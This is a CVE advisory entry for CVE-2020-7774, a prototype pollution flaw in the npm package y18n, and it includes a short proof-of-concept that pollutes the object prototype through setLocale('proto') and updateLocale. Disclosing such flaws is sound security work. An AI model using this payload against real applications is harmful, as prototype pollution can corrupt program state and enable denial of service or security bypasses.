CVE-2020-7774

2020-11-17T13:15:00
ID CVE-2020-7774
Type cve
Reporter report@snyk.io
Modified 2021-07-21T11:39:00

Description

This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true